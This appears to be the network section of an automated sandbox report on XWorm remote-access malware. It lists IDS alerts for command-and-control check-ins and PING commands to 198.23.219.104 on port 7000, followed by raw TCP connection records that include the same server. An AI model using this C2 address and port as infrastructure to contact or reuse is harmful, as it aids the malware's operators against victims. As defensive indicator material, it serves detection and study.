                                                                                                                                                                                                                              2024-10-13T19:03:58.406779+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:58.414732+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:59.437502+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:59.440157+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:59.536181+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:59.541481+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:59.630268+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:03.218492+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:03.221148+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:04.522879+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:04.797907+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:04.799393+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:08.751591+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:08.753397+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:09.441171+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:09.441171+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:09.571579+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:14.521346+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:14.937113+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:14.941337+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:15.026057+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:15.027365+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:15.121442+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:15.122707+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:19.527105+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:20.312041+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:20.317237+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:24.218338+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:24.227813+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:24.521560+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.186626+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.189851+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.248410+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.250473+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.283748+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.285413+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.379334+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.380984+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.474766+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.476203+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.529500+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.533935+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.569982+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:25.573863+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:26.952630+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:26.953644+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:29.281141+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:29.282554+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:29.521201+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:31.485110+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:31.486425+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:34.521100+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:36.002479+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:36.039005+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:36.043671+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:39.439166+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:39.439166+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:39.527841+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:40.867167+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:40.868044+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:44.520683+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:46.611127+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:46.612000+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:04:49.520751+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:54.547630+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:04:59.524112+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:00.991767+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:00.992732+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.233229+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.234194+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.296063+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.296893+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.321903+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.376986+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.471174+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.472203+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.524860+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.529937+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.565956+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.566864+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.749449+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.750227+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.990278+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:01.997514+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:03.909624+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:03.913428+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:04.521062+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:06.842611+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:06.843482+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:09.908847+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:09.908847+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:09.908898+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:09.908933+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:10.057053+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:10.058460+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:12.483271+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:12.486973+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:14.521260+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:14.654711+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:14.655457+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:18.032225+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:18.033934+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:19.520978+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:24.536728+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:29.536508+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:32.877198+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:32.878074+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:05:34.536046+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:39.442303+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:39.442303+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:05:39.574643+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.458867073 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.458913088 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.459018946 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.469775915 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.469795942 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.098721981 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.098805904 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.103379011 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.103398085 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.103807926 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.180860043 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.227413893 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.905345917 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.905494928 CEST44349738149.154.167.220192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.905606031 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:22.913469076 CEST49738443192.168.2.4149.154.167.220
                                                                                                                                                                                                                              Oct 13, 2024 19:01:23.198618889 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:23.204597950 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:23.204677105 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:23.236747980 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:23.241846085 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.479459047 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.557893038 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.651628017 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.657537937 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.657658100 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.657705069 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.657733917 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.657816887 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.657845020 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:24.657872915 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.477991104 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.540534973 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.545847893 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.545869112 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.545881987 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.546066999 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.546133995 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.546175003 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:29.546230078 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.477344990 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.524233103 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.529501915 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.529550076 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.529593945 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.529622078 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.529649019 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.529675961 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:34.529702902 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:38.152239084 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:38.157475948 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:38.262957096 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:38.359719992 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:38.390237093 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:38.395251036 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.383490086 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.477200985 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.477289915 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.552607059 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.557878971 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.558021069 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.558135033 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.558163881 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.558192015 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.558240891 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:39.558269024 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.477351904 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.522207022 CEST497397000192.168.2.4198.23.219.104
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.527646065 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.527683020 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.527717113 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.527750969 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.527777910 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.527806044 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:44.527832985 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.346888065 CEST4974980192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.352072001 CEST8049749208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.352160931 CEST4974980192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.352235079 CEST4974980192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.357311964 CEST8049749208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.903525114 CEST8049749208.95.112.1192.168.2.4
